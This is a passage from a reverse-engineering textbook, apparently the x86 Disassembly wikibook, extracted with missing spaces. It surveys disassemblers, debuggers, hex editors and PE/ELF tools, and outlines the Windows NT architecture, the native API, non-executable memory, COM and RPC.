(likeobjdump)tomanipulateexecutablesonthetar-
getplatform,andisavailableformostpopularplat-
forms.
1.4. ANALYSIS TOOLS 13
ForOSX/BSDsystems,thereisaroughequiv-
alentcalledotoolintheXCodekit.
Disassemblers atDMOZlistsahugenumberofdis-
assemblers
Program transformation wiki: disassembly lists
manyhighlyrecommendeddisassemblers
search for “disassemble” at SourceForge shows
manydisassemblersforavarietyofCPUs.
HopperisadisassemblerthatrunsonOS-Xanddis-
assembles32/64-bitOS-Xandwindowsbinaries.
TheUniversity of Queensland Binary Translator
(UQBT)is a reusable, component-based binary-
translation framework that supports CISC, RISC,
andstack-basedprocessors.
1.2.6 Furtherreading
[1]JimTurley. “TheTwoPercentSolution” . 2002.
[2]MarkHachman. “ARMCoresClimbInto3GTerritory” .
2002. “Although Intel and AMD receive the bulk of at-
tentioninthecomputingworld,ARM’sembedded32-bit
architecture,... hasoutsoldallothers.”
[3]Tom Krazit. “ARMed for the living room” . “ARM li-
censed1.6billioncores[in2005]". 2006.
http://www.crackmes.de/ : reverse engineering
challenges
“A Challengers Handbook” by Caesum has some
tipsonreverseengineeringprogramsinJavaScript,
FlashActionscript(SWF),Java,etc.
the Open Source Institute occasionally has reverse
engineeringchallengesamongitsotherbrainteasers.
TheProgramTransformationwikihasa Reverseen-
gineering and Re-engineering Roadmap , and dis-
cusses disassemblers, decompilers, and tools for
translating programs from one high-level language
toanotherhigh-levellanguage.
Otherdisassemblerswithmulti-platformsupport
1.3 DisassemblyExamples
1.3.1 Example:HelloWorldListing
Write a simple “Hello World” program using C or C++
and your favorite compiler. Generate a listing file from
the compiler. Does the code look the way you expect it
to? Doyouunderstandwhattheassemblycodemeans?Here are examples of C and C++ “Hello World!" pro-
grams.
#include<stdio.h>intmain(){printf(“HelloWorld!\n”);
return0;}
#include <iostream> int main() { std::cout << “Hello
World!\n";return0;}
1.3.2 Example:BasicDisassembly
Write a basic “Hello World!" program (see the example
above). Compile the program into an executable with
your favorite compiler, then disassemble it. How big is
thedisassembledcodefile? Howdoesitcomparetothe
codefromthelistingfileyougenerated? Canyouexplain
whythefileisthissize?
1.4 AnalysisTools
1.4.1 Debuggers
Debuggers areprogramsthatallowtheusertoexecutea
compiledprogramonestepatatime. Youcanseewhat
instructionsareexecutedinwhichorder,andwhichsec-
tions of the program are treated as code and which are
treatedasdata. Debuggersallowyoutoanalyzethepro-
gramwhileitisrunning, tohelpyougetabetterpicture
ofwhatitisdoing.
Advanceddebuggersoftencontainatleastarudimentary
disassembler,oftentimeshexeditingandreassemblyfea-
tures. Debuggers often allow the user to set breakpoints
on instructions, function calls, and even memory loca-
tions.
Abreakpointisaninstructiontothedebuggerthatallows
programexecutiontobehaltedwhenacertaincondition
is met. For instance, when a program accesses a certain
variable,orcallsacertainAPIfunction,thedebuggercan
pauseprogramexecution.
WindowsDebuggers
SoftICE Ade factostandard for Windows debugging.
SoftICE can be used for local kernel debugging ,
whichisafeaturethatisveryrare,andveryvaluable.
SoftICEwastakenoffthemarketinApril2006.
WinDbg WinDbgisafreepieceofsoftwarefromMi-
crosoft that can be used for local user-mode de-
bugging, or even remote kernel-mode debugging.
WinDbg is not the same as the better-known Vi-
sual Studio Debugger, but comes with a nifty GUI
nonetheless. Availablein32and64-bitversions.
14 CHAPTER 1. TOOLS
http://www.microsoft.com/whdc/devtools/debugging/
installx86.mspx
IDAPro The multi-processor, multi-OS, interactive
disassemblerbyDataRescue.
http://www.hex-rays.com/idapro/
OllyDbg OllyDbg is a free and powerful Windows de-
buggerwithabuilt-indisassemblyandassemblyen-
gine. Very useful for patching, disassembling, and
debugging.
http://www.ollydbg.de/
ImmunityDebugger Immunity Debugger is a branch
of OllyDbg v1.10, with built-in support for Python
scriptingandmuchmore.
http://immunityinc.com/products/debugger/index.
html
LinuxDebuggers
ManyoftheopensourcedebuggersonLinux,again,are
cross-platform. They may be available on some other
Unix(-like)systems, orevenWindows. Someofthede-
buggersmaygiveyoubetterexperiencethantheoldand
nativeonesonyoursystem.
gdbTheGNUdebugger,comeswithanynormalLinux
install. Itisquitepowerfulandevensomewhatpro-
grammable,thoughtherawuserinterfaceisharsh.
lldbLLVM’sdebugger.
emacsThe GNU editor, can be used as a front-end to
gdb. Thisprovidesapowerfulhexeditorandallows
fullscriptinginaLISP-likelanguage.
dddTheDataDisplayDebugger. It’sanotherfront-end
to gdb. This provides graphical representations of
datastructures. Forexample,alinkedlistwilllook
justlikeatextbookillustration.
strace,ltrace,andxtrace Lets you run a program
whilewatchingtheactionsitperforms. Withstrace,
you get a log of all the system calls being made.
Withltrace,yougetalogofallthelibrarycallsbe-
ingmade. Withxtrace,yougetalogofsomeofthe
funtioncallsbeingmade.
valgrind Executes a program under emulation, per-
forminganalysisaccordingtooneofthemanyplug-
inmodulesasdesired. Youcanwriteyourownplug-
in module as desired. Newer versions of valgrind
alsosupportOSX.NLKDAkerneldebugger.
http://forge.novell.com/modules/xfmod/project/?nlkd
edbAfullyfeaturedplugin-baseddebuggerinspiredby
thefamous OllyDbg.Projectpage
KDbgAgdbfront-endforKDE. http://kdbg.org
RR0DA Ring-0 Debugger for Linux. RR0D Project
Page
Winedbg Wine's debugger. Debugs Windows executa-
blesusingwine.
DebuggersforOtherSystems
dbxThe standard Unix debugger on systems derived
fromAT&TUnix. Itisoftenpartofanoptionalde-
velopmenttoolkitpackagewhichcomesatanextra
price. Itusesaninteractivecommandlineinterface.
ladebugAn enhanced debugger on Tru64 Unix sys-
tems from HP (originally Digital Equipment Cor-
poration) that handles advanced functionality like
threadsbetterthandbx.
DTraceAnadvancedtoolonSolaristhatprovidesfunc-
tionslikeprofilingandmanyothersontheentiresys-
tem,includingthekernel.
mdbThe Modular Debugger (MDB) is a new general
purpose debugging tool for the Solaris Operating
Environment. Itsprimaryfeatureisitsextensibility.
TheSolarisModularDebuggerGuidedescribeshow
to use MDB to debug complex software systems,
withaparticularemphasisonthefacilitiesavailable
for debugging the Solaris kernel andassociated de-
vicedriversandmodules. Italsoincludesacomplete
reference for and discussion of the MDB language
syntax, debugger features, and MDB Module Pro-
grammingAPI.
DebuggerTechniques
SettingBreakpoints As previously mentioned in the
sectionondisassemblers,a6-lineCprogramdoingsome-
thing as simple as outputting “Hello, World!" turns into
massive amounts of assembly code. Most people don't
want to sift through the entire mess to find out the in-
formation they want. It can be time consuming just to
find the information one desires by just looking through
thecode. Asanalternative,onecanchoosetosetbreak-
points to halt the program once it has reached a given
pointwithintheprogram’scode.
1.4. ANALYSIS TOOLS 15
For instance, let’s say that in your program you consis-
tantly experience crashes after one particular event: im-
mediately after closing a message box. You set break-
points on all calls to MessageBoxA . You run your pro-
gramwiththebreakpointsset, anditstops, readytocall
MessageBoxA .Executingeachlineone-by-onethereafter
(referred to as stepping) through the code, and watching
theprogramstack, youseethatabufferoverflowoccurs
soonafterthecall.
1.4.2 HexEditors
Hexeditors areabletodirectlyviewandeditthebinary
of a source file, and are very useful for investigating the
structure of proprietary closed-format data files. There
are many hex editors in existence. This section will at-
tempttolistsomeofthebest,someofthemostpopular,
orsomeofthemostpowerful.
HxD(Freeware) For Windows. A fast and powerful
freehex,diskandRAMeditor
http://mh-nexus.de/hxd/
FreewareHexEditorXVI32 For Windows. A free-
warehexeditor.
http://www.chmaas.handshake.de/delphi/freeware/
xvi32/xvi32.htm
wxHexEditor(Beta,ForWindowsandLinux,Free&
OpenSource)
AfasthexeditorspeciallyforHUGEfilesanddisk
devices, allows up to hexabyte, allow size changes
(injectanddeletes)withoutcreatingtempfile,could
view files with multiple panes, has built-in disas-
sembler,supportstagsfor(reverse)engineeringbig
binariesorfilesystems,couldviewfilesthrugXOR
encryption.
http://wxhexeditor.sourceforge.net/
HHDSoftwareHexEditorNeo ForWindows. Afast
file,disk,andmemoryeditorwithbuilt-indisassem-
blerandfilestructureviewer.
http://www.hhdsoftware.com/Family/hex-editor.html
Catch22HexEdit ForWindows. hisisapowerfulhex
editorwithaslewoffeatures. Hasanexcellentdata
structureviewer.
http://www.catch22.net/software/hexedit.asp
BreakPointHexWorkshop For Windows. An excel-
lent and powerful hex-editor, its usefulness is re-
stricted by the fact that it is not free like some of
theotheroptions.http://www.bpsoft.com/
TinyHexer Freeanddoesstatistics. ForWindows.
http://www.mirkes.de/files/
frhed-freehexeditor For Windows. Free and open-
source.
http://www.kibria.de/frhed.html
CygnusHexEditor For Windows. A very fast and
easy-to-usehexeditor,availableina'FreeEdition'.
http://www.softcircuits.com/cygnus/fe/
HexprobeHexEditor For Windows. A professional
hexeditordesignedtoincludeallthepowertodeal
with hex data, particularly helpful in the areas of
hex-byteeditingandbyte-patternanalysis.
http://www.hexprobe.com/hexprobe/index.htm
UltraEdit32 For Windows. A hex editor/text editor,
won “Application of the Year” at 2005 Shareware
IndustryAwardsConference.
http://www.ultraedit.com/
Hexinator(ForWindowsandLinux) lets you edit
files of unlimited size (overwrite, insert, delete),
displays text with dozens of text encodings, shows
variablesinlittleandbigendianbyteorder.
https://hexinator.com
ICYHexplorer For Windows. A lightweight free and
opensourcehexfileeditorwithsomeniftyfeatures,
suchaspixelview,structures,anddisassembling.
http://hexplorer.sourceforge.net/
WinHex For Windows. A powerful hex file and disk
editorwithadvancedabilitiesforcomputerforensics
and data recovery (used by governments and mili-
tary).
http://www.x-ways.net/index-m.html
010Editor ForWindows. Averypowerfulandfasthex
editorwithextensivesupportfordatastructuresand
scripting. Canbeusedtoeditdrivesandprocesses.
http://www.sweetscape.com/010editor/
1FhFor Windows. A free binary/hex editor which is
very fast, even while working with large files. It’s
theonlyWindowshexeditorthatallowsyoutoview
filesinbytecode(all256-characters).
16 CHAPTER 1. TOOLS
A view of a small binary file in a 1Fh hex editor.
http://www.4neurons.com/1Fh/
HexEdit For Windows (Open source) and shareware
versions. Powerful and easy to use binary file and
diskeditor.
http://www.hexedit.com/
HexToolkit For Windows. A free hex viewer specifi-
cally designed for reverse engineering file formats.
Allowsdatatobeviewedinvariousformatsandin-
cludesanexpressionevaluatoraswellasabinaryfile
comparisontool.
http://www.binaryearth.net/HexToolkit
FlexHex For Windows. It Provides full support for
NTFS files which are based on a more complex
modelthanFAT32files. Specifically,FlexHexsup-
portsSparsefiles andAlternatedatastreams offiles
on anyNTFSvolume. Can be used to edit OLE
compoundfiles,flashcards,andothertypesofphys-
icaldrives.
http://www.heaventools.com/flexhex-hex-editor.htm
HTEditor ForWindows. Afileeditor/viewer/analyzer
for executables. Its goal is to combine the low-
level functionality of a debugger and the usability
ofIDEs.
http://hte.sourceforge.net/
HexEdit For MacOS. A simple but reliable hex editor
wheryoutochangehighlightcolours. Thereisalso
aportforAppleClassicusers.
http://hexedit.sourceforge.net/
HexFiend For MacOS. A very simple hex editor, but
incrediblypowerfulnonetheless. It’sonly346KBto
downloadandtakesfilesasbigas116GB.
http://ridiculousfish.com/hexfiend/LinuxHexEditorsonly
bviAtypicalthree-panehexeditor,withavi-likeinter-
face.
emacsAlongwitheverythingelse, emacsalsoincludes
ahexeditor.
joeJoe’sowneditornowalsosupportshexediting.
blessAverycapablegtkbasedhexeditor.
xxdandanytexteditor Produceahexdumpwithxxd,
freely edit it in your favorite text editor, and then
convert it back to a binary file with your changes
included.
GHexHexeditorforGNOME.
http://directory.fsf.org/All_Packages_in_Directory/
ghex.html
OktetaThe well-integrated hexeditor from KDE since
4.1. Offers the traditional two-columns layout,
one with numeric values (binary, octal, decic-
mal, hexdecimal) and one with characters (lots of
charsets supported). Editing can be done in both
columns, with unlimited undo/redo. Small set of
tools(searching/replacing,strings,binaryfilter,and
more).
http://utils.kde.org/projects/okteta
BEYEA viewer of binary files with built-in editor in
binary, hexadecimal and disassembler modes. It
uses native Intel syntax for disassembly. Highlight
AVR/Java/Athlon64/Pentium 4/K7-Athlon disas-
sembler, Russiancodepages converter, fullpreview
offormats-MZ,NE,PE,NLM,coff32,elfpartial
-a.out,LE,LX,PharLap;codenavigatorandmore
over. (
http://beye.sourceforge.net/en/beye.html
BIEWA viewer of binary files with built-in editor in
binary, hexadecimal and disassembler modes. It
uses native Intel syntax for disassembly. Highlight
AVR/Java/Athlon64/Pentium 4/K7-Athlon disas-
sembler, Russiancodepages converter, fullpreview
offormats-MZ,NE,PE,NLM,coff32,elfpartial
-a.out,LE,LX,PharLap;codenavigatorandmore
over. (PROJECTRENAMED,seeBEYE)
http://biew.sourceforge.net/en/biew.html
hviewAcursesbasedhexeditordesignedtoworkwith
large(600+MB)fileswithasquickly,andwithlittle
overhead,aspossible.
1.4. ANALYSIS TOOLS 17
http://web.archive.org/web/20010306001713/http:
//tdistortion.esmartdesign.com/Zips/hview.tgz
HexCurse An ncurses-based hex editor written in C
thatcurrentlysupportshexanddecimaladdressout-
put, jumping to specified file locations, searching,
ASCII and EBCDIC output, bolded modifications,
anundocommand,quickkeyboardshortcuts,etc.
http://www.jewfish.net/description.php?title=
HexCurse
hexeditViewandeditfilesinhexadecimalorinASCII.
http://rigaux.org/hexedit.html
DataWorkshop An editor to view and modify binary
data; providesdifferentviewswhichcanbeusedto
edit,analyzeandexportthebinarydata.
http://www.dataworkshop.de/
VCHEAhexeditorwhichletsyouseeall256characters
asfoundinvideoROM,evencontrolandextended
ASCII,itusesthe/dev/vcsa*devicestodoit. Italso
couldeditnon-regularfiles,likeharddisks,floppies,
CDROMs, ZIPs, RAM, and almost any device. It
comes with a ncurses and a raw version for people
whoworkunderXorremotely.
http://www.grigna.com/diego/linux/vche/
DHEXDHEX is just another Hexeditor with a Diff-
modeforncurses. Itmakesheavyuseofcolorsand
isthemeable.
http://www.dettus.net/dhex/
1.4.3 OtherToolsforWindows
ResourceMonitors
SysInternalsFreeware This page has a large number
of excellent utilities, many of which are very use-
fultosecurityexperts, networkadministrators, and
(most importantly to us) reversers. Specifically,
check outProcess Monitor ,FileMon,RegMon,
TCPView,andProcessExplorer .
http://technet.microsoft.com/sysinternals/default.aspx
APIMonitors
SpyStudioFreeware TheSpyStudiosoftwareisatool
to hook into windows processes, log windows API
calltoDLLs,insertbreakpointsandchangeparam-
eters.
http://www.nektra.com/products/spystudio/rohitab.comAPIMonitor APIMonitorisafreesoft-
ware that lets you monitor and control API calls
madebyapplicationsandservices. Featuresinclude
detailed parameter information, structures, unions,
enumerated/flag data types, call stack, call tree,
breakpoints,customDLLs,memoryeditor,callfil-
tering, COM monitoring, 64-bit. Includes defini-
tionsforover13,000APIsand1,300+COMinter-
faces.
http://www.rohitab.com/apimonitor
PEFileHeaderdumpers
Dumpbin Dumpbin is a program that previously used
to be shipped with MS Visual Studio, but recently
thefunctionalityofDumpbinhasbeenincorporated
intotheMicrosoftLinker,link.exe. toaccessdump-
bin,pass/dumpasthefirstparametertolink.exe:
link.exe/dump[options]
It is frequently useful to simply create a batch
filethathandlesthisconversion:
::dumpbin.batlink.exe/dump%*
Allexamplesinthiswikibookthatusedumpbinwill
callitinthismanner.
Hereisalistofusefulfeaturesofdumpbin :
dumpbin /EXPORTS displays a list of functions ex-
ported from a library dumpbin /IMPORTS displays a
list of functions imported from other libraries dumpbin
/HEADERSdisplaysPEheaderinformationfortheexe-
cutable
http://msdn.microsoft.com/library/default.
asp?url=/library/en-us/vccore/html/_core_
dumpbin_reference.asp
Depends DependencyWalkerisaGUItoolwhichwill
allowyoutoseeexportsandimportsofbinaries. It
ships with many Microsoft tools including MS Vi-
sualStudio.
1.4.4 GNUTools
TheGNUpackageshavebeenportedtomanyplatforms
includingWindows.
GNUBinUtils The GNU BinUtils package contains
several small utilities that are very useful in deal-
ingwithbinaryfiles. Themostimportantprograms
in the list are the GNU objdump, readelf, GAS as-
sembler,andtheGNUlinker,althoughthereverser
might find more use in addr2line, c++filt, nm, and
readelf.
18 CHAPTER 1. TOOLS
http://www.gnu.org/software/binutils/
objdump Dumps out information about an executable
includingsymbolsandassembly. Itcomesstandard.
Itcanbemadetosupportnon-nativebinaryformats.
objdump -p displays a list of functions imported from
otherlibraries,exportedtoandmiscellaneousfileheader
information
It’susefultocheckdlldependenciesfromcommandline
readelfLikeobjdumpbutmorespecializedforELFex-
ecutables.
sizeListsthesizesofthesegments.
nmListsthesymbolsinanELFfile.
stringsPrintsthestringsfromafile.
fileTellsyouwhattypeoffileitis.
foldFoldstheresultsof stringsintosomethingpageable.
killCanbeusedtohaltaprogramwiththesig_stopsig-
nal.
straceTracesystemcallsandsignals.
1.4.5 OtherToolsforLinux
oprofileCan be used the find out what functions and
datasegmentsareused
subterfugue A tool for playing odd tricks on an exe-
cutable as it runs. The tool is scriptable in python.
The user can write scripts to take action on events
that occur, such as changing the arguments to sys-
temcalls.
http://subterfugue.org/
lizardLetsyourunaprogram backwards.
http://lizard.sourceforge.net/
dprobesLetsyouworkwithbothkernelandusercode.
biewBothahexeditorandadisassembler.
ltraceDisplaysruntimelibrarycallinformationfordy-
namicallylinkedexecutables.
asmDIFF Searches for functions, instructions and
memory pointers in different versions of same bi-
nary by using code metrics. Supports x86, x86_64
codeinPEandELFfiles.
http://duschkumpane.org/index.php/asmdiff1.4.6 XCodeTools
XCodecontains some extra tools to be used un-
der OS X with the Mach-O format. You can see
moreofthemunder/Applications/Xcode.app/Contents/
Developer/usr/bin/.
lipoManagesfatbinarieswithmultiplearchitectures.
otool Object file displaying tool ,workssomehowlikeob-
jdumpandreadelf.
XCodealsopacksalotofUnixtools,withmanyofthem
sharing the names (and functions) of the GNU tools.
Othertoolslikenasm/ndisasm,lldbandGNUascanalso
befound.
Chapter2
Platforms
2.1 MicrosoftWindows
2.1.1 MicrosoftWindows
TheWindowsoperatingsystem isapopularreverseen-
gineeringtargetforonesimplereason: theOSitself(mar-
ketshare,knownweaknesses),andmostapplicationsfor
it,arenotOpenSourceorfree. MostsoftwareonaWin-
dowsmachinedoesn'tcomebundledwithitssourcecode,
and most pieces have inadequate, or non-existent docu-
mentation. Occasionally,theonlywaytoknowprecisely
what a piece of software does (or for that matter, to de-
terminewhetheragivenpieceofsoftwareismaliciousor
legitimate)istoreverseit,andexaminetheresults.
2.1.2 WindowsVersions
Windows operating systems can be easily divided into 2
categories: Win9x,andWinNT.
Windows9x
TheWin9xkernelwasoriginallywrittentospanthe16bit
- 32bit divide. Operating Systems based on the 9x ker-
nel are: Windows 95, Windows 98, and Windows ME.
Win9x Series operating systems are known to be prone
to bugs and system instability. The actual OS itself was
a 32 bit extension of MS-DOS, its predecessor. An im-
portant issue with the 9x line is that they were all based
aroundusingtheASCIIformatforstoringstrings,rather
thanUnicode.
DevelopmentontheWin9xkernelendedwiththerelease
ofWindowsME.
WindowsNT
The WinNT kernel series was originally written as
enterprise-level server and network software. WinNT
stresses stability and security far more than Win9x ker-
nels did (although it can be debated whether that stresswas good enough). It also handles all string operations
internally in Unicode, giving more flexibility when us-
ingdifferentlanguages. OperatingSystemsbasedonthe
WinNTkernelare: WindowsNT(versions3.1,3.5,3.51
and 4.0), Windows 2000 (NT 5.0), Windows XP (NT
5.1), Windows Server 2003 (NT 5.2), Windows Vista
(NT 6.0), Windows 7 (NT 6.1), Windows 8 (NT 6.2),
Windows8.1(NT6.3),andWindows10(NT10.0).
The Microsoft XBOX and and XBOX 360 also run a
variantofNT,forkedfromWindows2000. Mostfuture
MicrosoftoperatingsystemproductsarebasedonNTin
someshapeorform.
2.1.3 VirtualMemory
32 bit WinNT allows for a maximum of 4Gb of virtual
memory space, divided into “pages” that are 4096 bytes
bydefault. Pagesnotincurrentusebythesystemorany
oftheapplicationsmaybewrittentoaspecialsectionon
theharddiskknownasthe“pagingfile.”Useofthepaging
filemayincreaseperformanceonsomesystems,although
highlatencyforI/OtotheHDDcanactuallyreduceper-
formanceinsomeinstances.
2.1.4 SystemArchitecture
The Windows architecture is heavily layered. Function
callsthataprogrammermakesmayberedirected3times
ormorebeforeanyactionisactuallyperformed. Thereis
anunignorablepenaltyforcallingWin32functionsfrom
auser-modeapplication. However, theupsideisequally
unignorable: codewritteninhigherlevelsofthewindows
systemismucheasiertowrite. Complexoperationsthat
involve initializing multiple data structures and calling
multiple sub-functions can be performed by calling only
asinglehigher-levelfunction.
The Win32 API comprises 3 modules: KERNEL32,
USER32, and GDI32. KERNEL32 is layered on top
ofNTDLL,andmostcallstoKERNEL32functionsare
simply redirected into NTDLL function calls. USER32
and GDI32 are both based on WIN32K (a kernel-
mode module, responsible for the Windows “look and
feel”), although USER32 also makes many calls to the
19
20 CHAPTER 2. PLATFORMS
more-primitive functions in GDI32. This and NTDLL
both provide an interface to the Windows NT kernel,
NTOSKRNL(seefurtherbelow).
NTOSKRNLisalsopartiallylayeredonHAL(Hardware
Abstraction Layer), but this interaction will not be con-
sidered much in this book. The purpose of this layer-
ing is to allow processor variant issues (such as location
of resources) to be made separate from the actual ker-
nel itself. A slightly different system configuration thus
requiresjustadifferentHALmodule,ratherthanacom-
pletelydifferentkernelmodule.
2.1.5 Systemcallsandinterrupts
After filtering through different layers of subroutines,
most API calls require interaction with part of the op-
erating system. Services are provided via 'software in-
terrupts’,traditionallythroughthe“int0x2e”instruction.
ThisswitchescontrolofexecutiontotheNTexecutive/
kernel,wheretherequestishandled. Itshouldbepointed
out here that the stack used in kernel mode is different
from the user mode stack. This provides an added layer
ofprotectionbetweenkernelanduser. Oncethefunction
completes, control is returned back to the user applica-
tion.
BothIntelandAMDprovideanextrasetofinstructions
toallowfastersystemcalls,the“SYSENTER”instruction
fromIntelandtheSYSCALLinstructionfromAMD.
2.1.6 Win32API
BothWinNTandWin9xsystemsutilizetheWin32API.
However,theWinNTversionoftheAPIhasmorefunc-
tionalityandsecurityconstructs,aswellasUnicodesup-
port. MostoftheWin32APIcanbebrokendowninto3
separatecomponents,eachperformingaseparatetask.
kernel32.dll
Kernel32.dll,homeoftheKERNELsubsystem,iswhere
non-graphical functions are implemented. Some of the
APIs located in KERNEL are: The Heap API, the Vir-
tualMemoryAPI,FileI/OAPI,theThreadAPI,theSys-
tem Object Manager, and other similar system services.
Mostofthefunctionalityofkernel32.dllisimplemented
in ntdll.dll, but in undocumented functions. Microsoft
prefers to publish documentation for kernel32 and guar-
antee that these APIs will remain unchanged, and then
put most of the work in other libraries, which are then
notdocumented.
gdi32.dll
gdi32.dll is the library that implements the GDI subsys-
tem,whereprimitivegraphicaloperationsareperformed.GDI diverts most of its calls into WIN32K, but it does
containamanagerforGDIobjects,suchaspens,brushes
and device contexts. The GDI object manager and the
KERNELobjectmanagerarecompletelyseparate.
user32.dll
TheUSERsubsystemislocatedintheuser32.dlllibrary
file. This subsystem controlsthe creation and manipula-
tion of USER objects, which are common screen items
such as windows, menus, cursors, etc... USER will set
up the objects to be drawn, but will perform the actual
drawingbycallingonGDI(whichinturnwillmakemany
calls to WIN32K) or sometimes even calling WIN32K
directly. USERutilizestheGDIObjectManager.
2.1.7 NativeAPI
The native API, hereby referred to as the NTDLL sub-
system, is a series of undocumented API function calls
thathandlemostoftheworkperformedbyKERNEL32.
MicrosoftalsodoesnotguaranteethatthenativeAPIwill
remainthesamebetweendifferentversions,asWindows
developersmodifythesoftware. Thisgivestheriskofna-
tiveAPIcallsbeingremovedorchangedwithoutwarning,
breakingsoftwarethatutilizesit.
ntdll.dll
The NTDLL subsystem is located in ntdll.dll. This li-
brarycontainsmanyAPIfunctioncalls, thatallfollowa
particular naming scheme. Each function has a prefix:
Ldr, Nt, Zw, Csr, Dbg, etc... and all the functions that
haveaparticularprefixallfollowparticularrules.
The “official” native API is usually limited only to func-
tionswhoseprefixisNtorZw. Thesecallsareinfactthe
same in user-mode: the relevant Export entries map to
thesameaddressinmemory. However,inkernel-mode,
theZw*systemcallstubssetthe previous mode tokernel-
mode,ensuringthatcertainparametervalidationroutines
arenotperformed. The origin of the prefix “Zw” is un-
known;thisprefixwaschosenduetoitshavingnosignif-
icanceatall[1].
In actual implementation, the system call stubs merely
load two registers with values required to describe a na-
tive API call, and then execute a software interrupt (or
thesysenterinstruction).
Most of the other prefixes are obscure, but the known
onesare:
Rtlstandsfor“RunTimeLibrary”,callswhichhelp
functionalityatruntime(suchasRtlAllocateHeap)
Csr is for “Client Server Runtime”, which repre-
sents the interface to the win32 subsystem located
incsrss.exe
2.1. MICROSOFT WINDOWS 21
Dbgfunctionsarepresenttoenabledebuggingrou-
tinesandoperations
Ldrprovidestheabilitytoload,manipulateandre-
trievedatafromDLLsandothermoduleresources
UserModeVersusKernelMode
Many functions, especially Run-time Library routines,
are shared between ntdll.dll and ntoskrnl.exe. Most Na-
tive API functions, as well as other kernel-mode only
functions exported from the kernel are useful for driver
writers. As such, Microsoft provides documentation on
many of the native API functions with the Microsoft
Server 2003 Platform DDK. The DDK (Driver Devel-
opmentKit)isavailableasafreedownload.
2.1.8 ntoskrnl.exe
ThismoduleistheWindowsNT"'Executive'",providing
all the functionality required by the native API, as well
as the kernel itself, which is responsible for maintaining
the machine state. By default, all interrupts and kernel
calls are channeled through ntoskrnl in some way, mak-
ingitthesinglemostimportantprograminWindowsit-
self. Manyofitsfunctionsareexported(allofwhichwith
variousprefixes,alaNTDLL)forusebydevicedrivers.
2.1.9 Win32K.sys
Thismoduleisthe“Win32Kernel”thatsitsontopofthe
lower-level,moreprimitiveNTOSKRNL.WIN32Kisre-
sponsible for the “look and feel” of windows, and many
portions of this code have remained largely unchanged
sincetheWin9xversions. Thismoduleprovidesmanyof
thespecificinstructionsthatcauseUSERandGDItoact
the way they do. It’s responsible for translating the API
calls from the USER and GDI libraries into the pictures
youseeonthemonitor.
2.1.10 Win64API
Withtheadventof64-bitprocessors,64-bitsoftwareisa
necessity. Asaresult,theWin64APIwascreatedtouti-
lizethenewhardware. Itisimportanttonotethatthefor-
matofmanyofthefunctioncallsareidenticalinWin32
andWin64,exceptforthesizeofpointers,andotherdata
typesthatarespecificto64-bitaddressspace.
Differences
2.1.11 WindowsVista
Microsoft has released a new version of its Windows
operation system, named “Windows Vista.” WindowsVistamaybebetterknownbyitsdevelopmentcode-name
“Longhorn.” Microsoft claims that Vista has been writ-
ten largely from the ground up, and therefore it can be
assumed that there are fundamental differences between
theVistaAPIandsystemarchitecture,andtheAPIsand
architectures of previous Windows versions. Windows
VistawasreleasedJanuary30th,2007.
2.1.12 Windows CE/Mobile, and other
versions
WindowsCE istheMicrosoftofferingonsmalldevices.
It largely uses the same Win32 API as the desktop sys-
tems, although it has a slightly different architecture.
SomeexamplesinthisbookmayconsiderWinCE.
2.1.13 “Non-ExecutableMemory”
Recent windows service packs have attempted to im-
plement a system known as “Non-executable memory”
where certain pages can be marked as being “non-
executable”. The purpose of this system is to prevent
some of the most common security holes by not allow-
ingcontroltopasstocodeinsertedintoamemorybuffer
by an attacker. For instance, a shellcode loaded into an
overflowed text buffer cannot be executed, stopping the
attackinitstracks. Theeffectivenessofthismechanism
isyettobeseen,however.
2.1.14 COMandRelatedTechnologies
COM,andawholeslewoftechnologiesthatareeitherre-
latedtoCOMorareactuallyCOMwithafancyname,is
anotherfactortoconsiderwhenreversingWindowsbina-
ries. COM, DCOM, COM+, ActiveX, OLE, MTS, and
Windows DNA are all names for the same subject, or
subjects,sosimilarthattheymayallbeconsideredunder
the same heading. In short, COM is a method to export
Object-OrientedClassesinauniform, cross-platform and
cross-language manner. In essence, COM is .NET, ver-
sion 0 beta. Using COM, components written in many
languagescanexport,import,instantiate,modify,andde-
stroy objects defined in another file, most often a DLL.
AlthoughCOMprovidescross-platform(tosomeextent)
and cross-language facilities, each COM object is com-
piled to a native binary, rather than an intermediate for-
mat such as Java or .NET. As a result, COM does not
requireavirtualmachinetoexecutesuchobjects.
ThisbookwillattempttoshowsomeexamplesofCOM
files, and the reversing challenges associated with them,
although the subject is very broad, and may elude the
scopeofthisbook(oratleasttheearlysectionsofit). The
discussionmaybepartofan“AdvancedTopic”foundin
thelatersectionsofthisbook.
DuetothewaythatCOMworks,alotofthemethodsand
22 CHAPTER 2. PLATFORMS
datastructuresexportedbyaCOMcomponentarediffi-
cult to perceive by simply inspecting the executable file.
Matters are made worse if the creating programmer has
usedalibrarysuchas ATLtosimplifytheirprogramming
experience. Unfortunatelyforareverseengineer,thisre-
duces the contents of an executable into a “Sea of bits”,
withpointersanddatastructureseverywhere.
2.1.15 RemoteProcedureCalls(RPC)
RPCisagenerictermreferringtotechniquesthatallowa
programrunningononemachinetomakecallsthatactu-
ally execute on another machine. Typically, this is done
bymarshalling allofthedataneededfortheprocedurein-
cludinganystateinformationstoredonthefirstmachine,
andbuildingitintoasingledatastructure,whichisthen
transmittedoversomecommunicationsmethodtoasec-
ondmachine. Thissecondmachinethenperformsthere-
quested action, and returns a data packet containing any
results and potentially changed state information to the
originatingmachine.
InWindowsNT,RPCistypicallyhandledbyhavingtwo
libraries that are similarly named, one which generates
RPC requests and accepts RPC returns, as requested by
a user-mode program, and one which responds to RPC
requests and returns results via RPC. A classic example
is the print spooler, which consists of two pieces: the
RPC stub spoolss.dll, and the spooler proper and RPC
service provider, spoolsv.exe. In most machines, which
are stand-alone, it would seem that the use of two mod-
ules communicating by means of RPC is overkill; why
notsimplyrollthemintoasingleroutine? Innetworked
printing, though, this makes sense, as the RPC service
providercanberesidentphysicallyonadistantmachine,
with the remote printer, and the local machine can con-
troltheprinterontheremotemachineinexactlythesame
waythatitcontrolsprintersonthelocalmachine.
[1]https://msdn.microsoft.com/en-us/library/windows/
hardware/ff565646(v=vs.85).aspx
2.2 WindowsExecutableFiles
2.2.1 MS-DOSCOMFiles
COM files are loaded into RAM exactly as they appear;
no change is made at all from the harddisk image to
RAM. This is possible due to the segmented memory
model of the early x86 line. Two 16-bit registers de-
termine the actual address used for a memory access, a
“segment” register specifying a 64K byte window into
the 1M+64K byte space (in 16-byte increments) and an“offset” specifying an offset into that window. The seg-
ment register would be set by DOS and the COM file
would be expected to respect this setting and not ever
change the segment registers. The offset registers, how-
ever,werefairgameandserved(forCOMfiles)thesame
